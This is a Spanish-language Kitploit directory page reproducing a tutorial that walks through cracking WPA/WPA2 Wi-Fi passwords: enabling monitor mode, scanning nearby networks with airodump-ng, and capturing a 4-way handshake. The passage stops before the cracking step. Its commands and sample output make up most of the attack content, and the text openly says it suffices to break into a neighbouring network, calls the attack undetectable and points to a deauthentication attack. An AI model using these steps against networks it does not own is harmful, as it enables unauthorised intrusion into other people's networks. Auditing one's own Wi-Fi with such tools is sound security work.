Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wifi-cracking — Descifra routers Wi-Fi WPA/WPA2 con Airodump-ng y Aircrack-ng/Hashcat | Kitploit
Herramientas/GitHubGitHub/brannondorsey/wifi-cracking
Descifrado de ContraseñasAuditoría Wi-FiAprendizaje y Educación
GitHubbrannondorsey/wifi-cracking

wifi-cracking

Descifra routers Wi-Fi WPA/WPA2 con Airodump-ng y Aircrack-ng/Hashcat

Ver Repositorio
12.6k1.2k119hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cracking de Wi-Fi

Crackea routers Wi-Fi WPA/WPA2 con Airodump-ng y Aircrack-ng/Hashcat.

Este es un breve tutorial que ilustra cómo crackear redes Wi-Fi aseguradas con contraseñas débiles. No es exhaustivo, pero debería ser información suficiente para que puedas probar la seguridad de tu propia red o entrar en una cercana. El ataque descrito a continuación es completamente pasivo (solo escucha, nada se transmite desde tu computadora) y es imposible de detectar siempre que no uses realmente la contraseña que crackees. Un ataque activo opcional de desautenticación puede usarse para acelerar el proceso de reconocimiento y se describe al final de este documento.

Si estás familiarizado con este proceso, puedes saltarte las descripciones e ir directamente a la lista de comandos al final. Para una variedad de sugerencias y métodos alternativos, consulta el apéndice. neal1991 y tiiime han proporcionado amablemente traducciones de este documento y el apéndice al chino si prefieres esas versiones.

DESCARGO DE RESPONSABILIDAD: Este software/tutorial es solo con fines educativos. No debe usarse para actividades ilegales. El autor no se hace responsable de su uso. No seas imbécil.

Comenzando

Este tutorial asume que:

  • Tienes familiaridad general usando la línea de comandos
  • Estás usando una distribución Linux basada en Debian, preferiblemente Kali Linux (usuarios de OSX consulten el apéndice)
  • Tienes Aircrack-ng instalado
    • sudo apt-get install aircrack-ng
  • Tienes una tarjeta inalámbrica que soporte modo monitor (consulta aquí una lista de dispositivos compatibles)

Cracking de una red Wi-Fi

Modo Monitor

Comienza listando las interfaces inalámbricas que soportan modo monitor con:

airmon-ng

Si no ves una interfaz listada, entonces tu tarjeta inalámbrica no soporta modo monitor 😞

Asumiremos que el nombre de tu interfaz inalámbrica es wlan0, pero asegúrate de usar el nombre correcto si difiere de este. A continuación, pondremos la interfaz en modo monitor:

airmon-ng start wlan0

Ejecuta iwconfig. Ahora deberías ver una nueva interfaz en modo monitor listada (probablemente mon0 o wlan0mon).

Encuentra tu objetivo

Empieza a escuchar las tramas Beacon 802.11 transmitidas por los routers inalámbricos cercanos usando tu interfaz monitor:

airodump-ng mon0

Deberías ver una salida similar a la siguiente:

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests                                                   
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8                                                          
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>                                                        
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro                                                          
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme                                                                 
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome                                                   
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2                                                                 
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2                                                          
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT                                                    
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root                                                                
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

Para los fines de esta demostración, elegiremos crackear la contraseña de mi red, "hackme". Recuerda la dirección MAC BSSID y el número de canal (CH) mostrados por airodump-ng, ya que los necesitaremos para el siguiente paso.

Capturar un handshake de 4 vías

WPA/WPA2 utiliza un handshake de 4 vías para autenticar dispositivos en la red. No necesitas saber nada sobre lo que eso significa, pero sí debes capturar uno de estos handshakes para poder crackear la contraseña de la red. Estos handshakes ocurren cada vez que un dispositivo se conecta a la red, por ejemplo, cuando tu vecino regresa del trabajo. Capturamos este handshake dirigiendo airodump-ng para monitorear el tráfico en la red objetivo usando los valores del canal y bssid descubiertos con el comando anterior.

# reemplaza los valores de -c y --bssid con los de tu red objetivo
# -w especifica el directorio donde guardaremos la captura de paquetes
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]                                        
                                                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS  

Ahora esperamos... Una vez que hayas capturado un handshake, deberías ver algo como [ WPA handshake: bc:d3:c9:ef:d2:67 en la parte superior derecha de la pantalla, justo a la derecha de la hora actual.

Si te sientes impaciente y te sientes cómodo usando un ataque activo, puedes forzar que los dispositivos conectados a la red objetivo se reconecten, enviándoles paquetes de desautenticación maliciosos. Esto a menudo resulta en la captura de un handshake de 4 vías. Consulta la sección de ataque de desautenticación a continuación para más información.

Una vez que hayas capturado un handshake, presiona ctrl-c para salir de airodump-ng. Deberías ver un archivo .cap en el lugar donde le indicaste a airodump-ng guardar la captura (probablemente llamado -01.cap). Usaremos este archivo de captura para crackear la contraseña de la red. Me gusta renombrar este archivo para reflejar el nombre de la red que estamos intentando crackear:

mv ./-01.cap hackme.cap

Crackear la contraseña de la red

Descargar herramienta